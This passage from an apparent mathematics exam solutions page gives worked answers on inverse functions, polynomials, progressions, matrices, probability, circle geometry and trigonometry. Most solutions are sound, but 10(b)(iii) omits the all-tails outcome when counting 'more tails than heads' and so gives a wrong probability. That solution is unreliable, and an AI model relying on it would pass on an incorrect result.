{\sqrt[3]{{x+\delta x}}} \right)}}^{3}}-{{{\left( {\sqrt[3]{x}} \right)}}^{3}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-\left( {\sqrt[3]{{x+\delta x}}-\sqrt[3]{x}} \right)}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{3}}-{{{\left( {\sqrt[3]{x}} \right)}}^{3}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-\left( {\sqrt[3]{{x+\delta x}}-\sqrt[3]{x}} \right)}}{{\left( {\sqrt[3]{{x+\delta x}}-\sqrt[3]{x}} \right)\left[ {{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{2}}+\left( {\sqrt[3]{{x+\delta x}}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}} \right]}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{2}}+\left( {\sqrt[3]{{x+\delta x}}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\displaystyle \frac{{dy}}{{dx}}=\underset{{\delta x\to 0}}{\mathop{{\lim }}}\,\displaystyle \frac{{\delta y}}{{\delta x}}\\[2.5ex]\ \ \ \ \ 
=\underset{{\delta x\to 0}}{\mathop{{\lim }}}\,\left[ {\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{2}}+\left( {\sqrt[3]{{x+\delta x}}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}} \right]\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{x}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{x}} \right)}}^{2}}+\left( {\sqrt[3]{x}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{x}} \right)}}^{2}}+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{{-1}}{{3\cdot {{{\left( {\sqrt[3]{x}} \right)}}^{2}}{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{{-1}}{{3\cdot {{{\left( {\sqrt[3]{x}} \right)}}^{4}}}}\\[2.5ex]\ \ \ \ \ \end{array}$ SECTION (B) (Answer Any FOUR questions.) 6 (a).    Given that Given $\displaystyle A=\{x\in R|\ x\ne -\frac{1}{2},x\ne \frac{3}{2}\}$. If $f:A\to A$ and $g:A\to A$ are defined by $f(x)=\displaystyle \frac{3x-5}{2x+1}$ and $g(x)=\displaystyle \frac{x+5}{3-2x}$, show that $f$ and $g$ are inverse of each other. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\begin{array}{c|c} { \displaystyle \begin{array}{l}A=\{x\in R|\ x\ne -\displaystyle \frac{1}{2},x\ne \displaystyle \frac{3}{2}\}\\[2ex]f:A\to A,f(x)=\displaystyle \frac{{3x-5}}{{2x+1}}\\[2ex]g:A\to A,g(x)=\displaystyle \frac{{x+5}}{{3-2x}}\\[2ex](f\cdot g)(x)=f\left( {g(x)} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =f\left( {\displaystyle \frac{{x+5}}{{3-2x}}} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{3\left( {\displaystyle \frac{{x+5}}{{3-2x}}} \right)-5}}{{2\left( {\displaystyle \frac{{x+5}}{{3-2x}}} \right)+1}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{3x+15-15+10x}}{{3-2x}}}}{{\displaystyle \frac{{2x+10+3-2x}}{{3-2x}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{13x}}{{3-2x}}}}{{\displaystyle \frac{{13}}{{3-2x}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =x\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =I(x)\end{array}} & { \displaystyle \begin{array}{l}(g\cdot f)(x)=g\left( {f(x)} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =g\left( {\displaystyle \frac{{3x-5}}{{2x+1}}} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\left( {\displaystyle \frac{{3x-5}}{{2x+1}}} \right)+5}}{{3-2\left( {\displaystyle \frac{{3x-5}}{{2x+1}}} \right)}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{3x-5+10x+5}}{{2x+1}}}}{{\displaystyle \frac{{6x+3-6x+10}}{{2x+1}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{13x}}{{2x+1}}}}{{\displaystyle \frac{{13}}{{2x+1}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =x\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =I(x)\\[2ex]\therefore (f\cdot g)(x)=(g\cdot f)(x)=I(x)\\[2ex]\therefore f={{g}^{{-1}}}\ \text{and}\ g={{f}^{{-1}}}\end{array}}\end{array}\end{array}$ 6 (b).     Given that $x^5 + ax^3 + bx^2 - 3 = (x^2 - 1) Q(x) - x - 2$, where $Q(x)$ is a polynomial. State the degree of $Q (x)$ and find the values of $a$ and $b$. Find also the remainder when $Q (x)$ is divided by $x + 2$. 
(5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}-3=({{x}^{2}}-1)Q(x)-x-2\\[2ex]{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}+x-1=({{x}^{2}}-1)Q(x)\\[2ex]\text{degree}\ \text{of }Q\left( x \right)=3\\[2ex]{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}+x-1=({{x}^{2}}-1)Q(x)\\[2ex]{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}+x-1=(x-1)(x+1)Q(x)\\[2ex]\text{When}\ x=1\\[2ex]1+a+b+1-1=(1-1)(1+1)Q(x)\\[2ex]1+a+b=0\\[2ex]a+b=-1\ -------(1)\\[2ex]\text{When}\ x=-1\\[2ex]-1-a+b-1-1=(-1-1)(-1+1)Q(x)\\[2ex]-3-a+b=0\\[2ex]-a+b=3\ \ \ ------(2)\\[2ex](1)+(2)\Rightarrow 2b=2\Rightarrow b=1\\[2ex](1)-(2)\Rightarrow 2a=-4\Rightarrow a=-2\\[2ex]{{x}^{5}}-2{{x}^{3}}+{{x}^{2}}+x-1=({{x}^{2}}-1)Q(x)\\[2ex]\therefore Q(x)=\displaystyle \frac{{{{x}^{5}}-2{{x}^{3}}+{{x}^{2}}+x-1}}{{{{x}^{2}}-1}}\\[2ex]\text{When }Q(x)\text{ is divided by }x+2\text{, }\\[2ex]\text{the remainder is }Q(-2).\\[2ex]\therefore Q(-2)=\displaystyle \frac{{{{{(-2)}}^{5}}-2{{{(-2)}}^{3}}+{{{(-2)}}^{2}}+(-2)-1}}{{{{{(-2)}}^{2}}-1}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ =-5\end{array}$ 7 (a).     The binary operation $\odot$ on $R$ be defined by $x\odot y=x+y+10xy$ Show that the binary operation is commutative. Find the values $b$ such that $(1\odot b)\odot b=485$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}x\odot y=x+y+10xy\\[2ex]y\odot x=y+x+10yx\\[2ex]\ \ \ \ \ \ \ \ =x+y+10xy\\[2ex]\therefore x\odot y=y\odot x\\[2ex]\therefore \ \text{The binary operation is commutative}\text{.}\\[2ex]1\odot b=1+b+10b\\[2ex](1\odot b)\odot b=(1+b+10b)\odot b\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =(1+b+10b)+b+10(1+b+10b)b\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+22b+110{{b}^{2}}\\[2ex](1\odot b)\odot b=485\\[2ex]1+22b+110{{b}^{2}}=485\\[2ex]110{{b}^{2}}+22b-484=0\\[2ex]5{{b}^{2}}+b-22=0\\[2ex](5b+11)(b-2)=0\\[2ex]b=-\displaystyle \frac{{11}}{5}\ \text{or}\ b=2\end{array}$ 7 (b).     If, in the expansion of $(1 + x)^m (1 - x)^n$, the coefficient of $x$ and $x^2$ are $-5$ and $7$ respectively, then find the value of $m$ and $n$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{(1+x)}^{m}}{{(1-x)}^{n}}=\left( {1+{}^{m}{{C}_{1}}x+{}^{m}{{C}_{2}}{{x}^{2}}+...} \right)\left( {1-{}^{n}{{C}_{1}}x+{}^{n}{{C}_{2}}{{x}^{2}}+...} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {{}^{m}{{C}_{1}}-{}^{n}{{C}_{1}}} \right)x+\left( {{}^{m}{{C}_{2}}-{}^{m}{{C}_{1}}{}^{n}{{C}_{1}}+{}^{n}{{C}_{2}}} \right){{x}^{2}}+...\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {m-n} \right)x+\left( {\displaystyle \frac{{m(m-1)}}{2}-mn+\displaystyle \frac{{n(n-1)}}{2}} \right){{x}^{2}}+...\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {m-n} \right)x+\left( {\displaystyle \frac{{{{m}^{2}}-2mn+{{n}^{2}}-(m+n)}}{2}} \right){{x}^{2}}+...\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {m-n} \right)x+\left( {\displaystyle \frac{{{{{(m-n)}}^{2}}-(m+n)}}{2}} \right){{x}^{2}}+...\\[2ex]\text{By the problem,}\\[2ex]\ \ \ \ m-n=-5\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ------(1)\\[2ex]\ \ \ \displaystyle \frac{{{{{(m-n)}}^{2}}-(m+n)}}{2}=7\\[2ex]\therefore \displaystyle \frac{{{{{(-5)}}^{2}}-(m+n)}}{2}=7\\[2ex]\ \ \ 25-(m+n)=14\\[2ex]\ \ \ m+n=11\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ------(2)\\[2ex](1)+(2)\Rightarrow 2m=6\Rightarrow m=3\\[2ex](1)-(2)\Rightarrow -2n=-16\Rightarrow n=8\end{array}$ 8 (a).     Find the solution set in $R$ for the inequation $2x (x + 2)\ge (x + 1) (x + 3)$ and illustrate it on the number line. 
(5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}2x(x+2)\ge (x+1)(x+3)\\[2ex]2{{x}^{2}}+4x\ge {{x}^{2}}+4x+3\\[2ex]{{x}^{2}}-3\ge 0\\[2ex]\left( {x+\sqrt{3}} \right)\left( {x-\sqrt{3}} \right)\ge 0\\[2ex]\left( {x+\sqrt{3}\ge 0\ \text{and}\ x-\sqrt{3}\ge 0} \right)\ \text{or}\ \left( {x+\sqrt{3}\le 0\ \text{and}\ x-\sqrt{3}\le 0} \right)\ \\[2ex]\left( {x\ge -\sqrt{3}\ \text{and}\ x\ge \sqrt{3}} \right)\ \text{or}\ \left( {x\le -\sqrt{3}\ \text{and}\ x\le \sqrt{3}} \right)\ \\[2ex]\therefore x\ge \sqrt{3}\ \text{or}\ x\le -\sqrt{3}\\[2ex]\therefore \ \text{Solution Set = }\left\{ {x\ |\ x\le -\sqrt{3}\ \text{or}\ x\ge \sqrt{3}} \right\}\\[2ex]\text{Number Line}\end{array}$ 8 (b).     If the ${{m}^{{\text{th}}}}$ term of an A.P. is $\displaystyle \frac{1}{n}$ and ${{n}^{{\text{th}}}}$ term is $\displaystyle \frac{1}{m}$ where $m\ne n$, then show that $u_{mn} = 1$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Let the first and the common difference }\\[2ex]\text{of the give A}\text{.P}\text{. be }a\ \text{and }d\ \text{respectively}\text{.}\\[2ex]\text{By the problem,}\\[2ex]{{u}_{m}}=\displaystyle \frac{1}{n}\\[2ex]a+(m-1)d=\displaystyle \frac{1}{n}\\[2ex]na+mnd-nd=1\ \ \ \ \ \ -----(1)\\[2ex]{{u}_{n}}=\displaystyle \frac{1}{m}\\[2ex]a+(n-1)d=\displaystyle \frac{1}{m}\\[2ex]ma+mnd-md=1\ \ \ \ -----(2)\\[2ex](1)-(2)\Rightarrow a(n-m)-(n-m)d=0\\[2ex]\therefore (n-m)(a-d)=0\\[2ex]\text{Since}\ m\ne n,n-m\ne 0.\\[2ex]\therefore a-d=0\Rightarrow a=d\\[2ex]\text{By equation (2), }\\[2ex]am+mnd-md=1\ \Rightarrow mnd=1\Rightarrow mna=1\\[2ex]\therefore {{u}_{{mn}}}=a+(mn-1)d\\[2ex]\ \ \ \ \ \ \ \ =d+mnd-d\\[2ex]\ \ \ \ \ \ \ \ =1\end{array}$ 9 (a).     The sum of the first two terms of a geometric progression is $12$ and the sum of the first four terms is $120$. Calculate the two possible values of the fourth term in the progression. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Let the first and the common ratio }\\[2ex]\text{of the give G}\text{.P}\text{. be }a\ \text{and }r\ \text{respectively}\text{.}\\[2ex]\text{By the problem,}\\[2ex]{{u}_{1}}+{{u}_{2}}=12\\[2ex]a+ar=12\\[2ex]a\left( {1+r} \right)=12\ \ \ \ \ \ \ -----(1)\\[2ex]{{u}_{1}}+{{u}_{2}}+{{u}_{3}}+{{u}_{4}}=120\\[2ex]12+{{u}_{3}}+{{u}_{4}}=120\\[2ex]{{u}_{3}}+{{u}_{4}}=108\\[2ex]a{{r}^{2}}+a{{r}^{3}}=108\\[2ex]a{{r}^{2}}\left( {1+r} \right)=108-----(2)\\[2ex]\therefore \displaystyle \frac{{a{{r}^{2}}\left( {1+r} \right)}}{{a\left( {1+r} \right)}}=\displaystyle \frac{{108}}{{12}}\\[2ex]\ \ \ {{r}^{2}}=9\Rightarrow r=\pm 3\\[2ex]\text{When}\ r=-3,\ a\left( {1-3} \right)=12\ \Rightarrow -6\\[2ex]\therefore {{u}_{4}}=a{{r}^{3}}=-6{{(-3)}^{3}}=162\\[2ex]\text{When}\ r=3,\ a\left( {1+3} \right)=12\ \Rightarrow 3\\[2ex]\therefore {{u}_{4}}=a{{r}^{3}}=3{{(3)}^{3}}=81\end{array}$ 9 (b).     Given that $A=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\ {\sin \theta } & {\cos \theta } \end{array}} \right)$. If $A + A' = I$ where $I$ is a unit matrix of order $2$, find the value of $\theta$ for $\displaystyle 0{}^\circ <\theta <90{}^\circ$. 
(5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}A=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\[2ex] {\sin \theta } & {\cos \theta } \end{array}} \right)\\[2ex]{A}'=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {\sin \theta } \\[2ex] {-\sin \theta } & {\cos \theta } \end{array}} \right)\\[2ex]\text{By the problem,}\\[2ex]A+{A}'=I\\[2ex]\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\[2ex] {\sin \theta } & {\cos \theta } \end{array}} \right)+\left( {\begin{array}{*{20}{c}} {\cos \theta } & {\sin \theta } \\[2ex] {-\sin \theta } & {\cos \theta } \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\left( {\begin{array}{*{20}{c}} {2\cos \theta } & 0 \\[2ex] 0 & {2\cos \theta } \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\therefore 2\cos \theta =1\\[2ex]\ \ \ \cos \theta =\displaystyle \frac{1}{2}\\[2ex]\ \ \ \theta =60{}^\circ \end{array}$ 10 (a).   The matrix $A$ is given by $\displaystyle A=\left( {\begin{array}{*{20}{c}} 2 & 3 \\ 4 & 5 \end{array}} \right)$. (a) Prove that $A^2 = 7A + 2I$ where $I$ is the unit matrix of order $2$. (b) Hence, show that $\displaystyle {{A}^{{-1}}}=\frac{1}{2}~\left( {A-7I} \right)$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}A=\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)\\[2ex]{{A}^{2}}=\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {2\times 2+3\times \;4} & {2\times \;3+3\times \;5} \\[2ex] {4\times \;2+5\times \;4} & {4\times \;3+5\times \;5} \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {16} & {21} \\[2ex] {28} & {37} \end{array}} \right)\\[2ex]7A+2I=7\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)+2\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {14} & {21} \\[2ex] {28} & {35} \end{array}} \right)+\left( {\begin{array}{*{20}{c}} 2 & 0 \\[2ex] 0 & 2 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {16} & {21} \\[2ex] {28} & {37} \end{array}} \right)\\[2ex]\therefore {{A}^{2}}=7A+2I\\[2ex]\therefore A\cdot A\cdot {{A}^{{-1}}}=7A\cdot {{A}^{{-1}}}+2I\cdot {{A}^{{-1}}}\\[2ex]\therefore A\cdot I=7I+2{{A}^{{-1}}}\\[2ex]\therefore A=7I+2{{A}^{{-1}}}\\[2ex]\therefore 2{{A}^{{-1}}}=A-7I\\[2ex]\therefore {{A}^{{-1}}}=\displaystyle \frac{1}{2}\left( {A-7I} \right)\end{array}$ 10 (b).   Draw a tree diagram to list all possible outcomes when four fair coins are tossed simultaneously. Hence determine the probability of getting: (a) all heads, (b) two heads and two tails, (c) more tails than heads, (d) at least one tail, (e) exactly one head. 
(5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\therefore \ \ \text{Number of possible outcomes}\ =16\\[2ex](\text{i})\ \text{The set of favourable outcomes for getting all heads}\ \text{=}\left\{ {(H,H,H,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 1}\\[2ex]\ \ \ \ P\text{ (getting all heads) =}\displaystyle \frac{1}{{16}}\\[2ex](\text{ii})\ \text{The set of favourable outcomes for getting two heads and two tails}\\[2ex]\ \ \ \ \ \text{=}\left\{ {(H,H,T,T),\text{ }(H,T,H,T),\text{ }(H,T,T,H),\text{ }(T,H,H,T),\text{ }(T,H,T,H),\text{ }(T,T,H,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 6}\\[2ex]\ \ \ \ P\text{ (getting two heads and two tails) =}\displaystyle \frac{6}{{16}}=\displaystyle \frac{3}{8}\\[2ex](\text{iii})\ \text{The set of favourable outcomes for getting more tails than heads}\\[2ex]\ \ \ \ \ \text{=}\left\{ {(H,T,T,T),\text{ }(T,H,T,T),\text{ }(T,T,H,T),\text{ }(T,T,T,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 4}\\[2ex]\ \ \ \ P\text{ (getting more tails than heads) =}\displaystyle \frac{4}{{16}}=\displaystyle \frac{1}{4}\\[2ex](\text{iv})\ P\text{ (getting at least one tail)}=1-P\text{ (no tail)}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1-P\text{ (all head)}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1-\displaystyle \frac{1}{{16}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{15}}{{16}}\\[2ex](\text{v})\ \text{The set of favourable outcomes for getting exactly one head}\\[2ex]\ \ \ \ \ \text{=}\left\{ {(H,T,T,T),\text{ }(T,H,T,T),\text{ }(T,T,H,T),\text{ }(T,T,T,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 4}\\[2ex]\ \ \ \ P\text{ (getting exactly one head) =}\displaystyle \frac{4}{{16}}=\displaystyle \frac{1}{4}\end{array}$ SECTION (C) (Answer Any THREE questions.) 11 (a).   $PQR$ is a triangle inscribed in a circle. The tangent at $P$ meet $RQ$ produced at $T$,and $PC$ bisecting $\angle RPQ$ meets side $RQ$ at $C$. Prove $\triangle TPC$ is isosceles. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\angle TPC=\beta +\gamma \\[2ex]\angle R=\gamma \ \ \ [\angle \ \text{between tangent and chord}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\angle \ \text{in alternate segment }\!\!]\!\!\text{ }\\[2ex]\text{Since }PC\ \text{bisects}\ \angle RPQ,\ \\[2ex]\beta =\alpha \\[2ex]\therefore \angle TPC=\alpha +\angle R\\[2ex]\text{In}\ \triangle RPC,\ \angle PCT=\alpha +\angle R\\[2ex]\angle TPC=\angle PCT\\[2ex]\therefore \,\triangle TPC\ \text{is isosceles}\text{.}\end{array}$ 11 (b).   In $\triangle ABC$, $D$ is a point of $AC$ such that $AD = 2CD$. $E$ is on $BC$ such that $DE \parallel AB$. Compare the areas of $\triangle CDE$ and $\triangle ABC$. If $\alpha (ABED) = 40$, what is $\alpha(ΔABC)$? 
(5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\ \ \ AD=\text{ }2CD\ \text{ }\!\![\!\!\text{ given }\!\!]\!\!\text{ }\\[2ex]\ \ \ DE\parallel AB\\[2ex]\therefore \ \triangle CAB\sim\triangle CDE\\[2ex]\therefore \displaystyle \frac{{\alpha (\triangle CAB)}}{{\alpha (\triangle CDE)}}=\displaystyle \frac{{A{{C}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{{(AD+CD)}}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{{(2CD+CD)}}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{9C{{D}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =9\\[2ex]\therefore \displaystyle \frac{{\alpha (\triangle CAB)}}{{\alpha (\triangle CAB)-\alpha (\triangle CDE)}}=\displaystyle \frac{9}{{9-1}}\\[2ex]\therefore \displaystyle \frac{{\alpha (\triangle CAB)}}{{\alpha (ABED)}}=\displaystyle \frac{9}{8}\\[2ex]\therefore \alpha (\triangle CAB)=\displaystyle \frac{9}{8}\alpha (ABED)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{9}{8}\times 40\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =45\ \text{sq-unit}\end{array}$ 12 (a).   If $L, M, N,$ are the middle points of the sides of the $\triangle ABC$, and $P$ is the foot of perpendicular from $A$ to $BC$. Prove that $L, N, P, M$ are concyclic. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Since }AP\bot BC\text{ and }M\text{ is the midpoint of }AC\text{, }\\[2ex]\text{a circle with centre }M\text{ and diameter }AC\text{ }\\[2ex]\text{will pass through }P\text{.}\\[2ex]\therefore MP\text{ = }MC\text{ }\!\![\!\!\text{ radii of }\odot M\text{ }\!\!]\!\!\text{ }\\[2ex]\therefore \gamma \ \text{=}\ \phi \text{.}\\[2ex]\text{Since }L\text{ and }N\text{ are the midpoints of }AB\text{ and }BC\text{, }\\[2ex]LN\parallel AC\ \text{and }LN=\displaystyle \frac{1}{2}AC.\\[2ex]\text{Similarly }LM\parallel BC\ \text{and }LM=\displaystyle \frac{1}{2}BC.\\[2ex]LMCN\ \text{is a parallelogram}\text{.}\\[2ex]\therefore \gamma \ \text{=}\theta \Rightarrow \phi \ \text{=}\theta \\[2ex]\text{Since}\ \phi +\angle MPN=\text{ }180{}^\circ ,\\[2ex]\ \theta +\angle MPN=\text{ }180{}^\circ ,\\[2ex]L,\ N,\ P,\ M\ \text{are concyclic}\text{.}\end{array}$ 12 (b).   Solve the equation $\displaystyle \sqrt{3}\cos \theta +\sin \theta =\sqrt{2}$ for $\displaystyle 0{}^\circ \le \theta \le 360{}^\circ$. 
(5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\sqrt{3}\cos \theta +\sin \theta =\sqrt{2},\ 0{}^\circ \le \theta \le 360{}^\circ \\[2ex]\text{Let}\ R\cos \alpha =\sqrt{3}\ \text{and}\ R\sin \alpha =1\ \\[2ex]\text{where }R>0\ \text{and}\ \alpha <90{}^\circ .\\[2ex]\therefore {{R}^{2}}{{\cos }^{2}}\alpha +{{R}^{2}}{{\sin }^{2}}\alpha =3+1\\[2ex]\therefore \ {{R}^{2}}\left( {{{{\cos }}^{2}}\alpha +{{{\sin }}^{2}}\alpha } \right)=4\\[2ex]\therefore \ {{R}^{2}}=4\Rightarrow R=2\text{ }\\[2ex]\ \ \ \displaystyle \frac{{R\sin \alpha }}{{R\cos \alpha }}=\displaystyle \frac{1}{{\sqrt{3}}}\\[2ex]\therefore \ \tan \alpha =\ \displaystyle \frac{1}{{\sqrt{3}}}\Rightarrow \alpha =30{}^\circ \\[2ex]\text{Now}\ \ \ \sqrt{3}\cos \theta +\sin \theta \\[2ex]\ \ \ \ \ \ \ \ =R\cos \theta \cos \alpha +R\sin \theta \sin \alpha \\[2ex]\ \ \ \ \ \ \ \ =R\left( {\cos \theta \cos \alpha +\sin \theta \sin \alpha } \right)\\[2ex]\ \ \ \ \ \ \ \ =R\cos \left( {\theta -\alpha } \right)\\[2ex]\ \ \ \ \ \ \ \ =2\cos \left( {\theta -30{}^\circ } \right)\\[2ex]\therefore 2\cos \left( {\theta -30{}^\circ } \right)=\sqrt{2}\\[2ex]\therefore \cos \left( {\theta -30{}^\circ } \right)=\displaystyle \frac{{\sqrt{2}}}{2}\\[2ex]\therefore \theta -30{}^\circ =45{}^\circ \ \text{or}\ \theta -30{}^\circ =315{}^\circ \\[2ex]\therefore \theta =75{}^\circ \ \text{or}\ \theta =345{}^\circ \end{array}$ 13 (a).   In $\triangle ABC, AB = x, BC = x + 2$, $AC = x - 2$ where $x > 4$, prove that $\displaystyle \cos A=\frac{{x-8}}{{2(x-2)}}$. Find the integral values of $x$ for which $A$ is obtuse. (5 marks) Show/Hide Solution $\displaystyle \vartriangle ABC,AB=x,BC=x+2,AC=x-2,\ x>4$ $\displaystyle \cos A=\displaystyle \frac{{A{{B}^{2}}+A{{C}^{2}}-B{{C}^{2}}}}{{2\cdot AB\cdot AC}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{x}^{2}}+{{{(x-2)}}^{2}}-{{{(x+2)}}^{2}}}}{{2\cdot x\cdot (x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{x}^{2}}+{{x}^{2}}-4x+4-{{x}^{2}}-4x-4}}{{2\cdot x\cdot (x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{x}^{2}}-8x}}{{2\cdot x\cdot (x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{x(x-8)}}{{2x(x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{x-8}}{{2(x-2)}}$ $\displaystyle \text{Since }A\ \text{is obtuse,}$ $\displaystyle \cos A<0$ $\displaystyle \displaystyle \frac{{x-8}}{{2(x-2)}}<0$ $\displaystyle \text{Since}\ x>4,\ x-2>2>0.$ $\displaystyle \therefore x-8<0\Rightarrow x<8$ $\displaystyle \therefore 4<x<8$ $\displaystyle \therefore \ \text{The integral values of }x\text{ are }5,\ 6\ \text{and }7.$ 13 (b).   The sum of the perimeters of a circle and square is $k$, where $k$ is some constant. Using calculus, prove that the sum of their areas is least, when the side of the square is double the radius of the circle. 
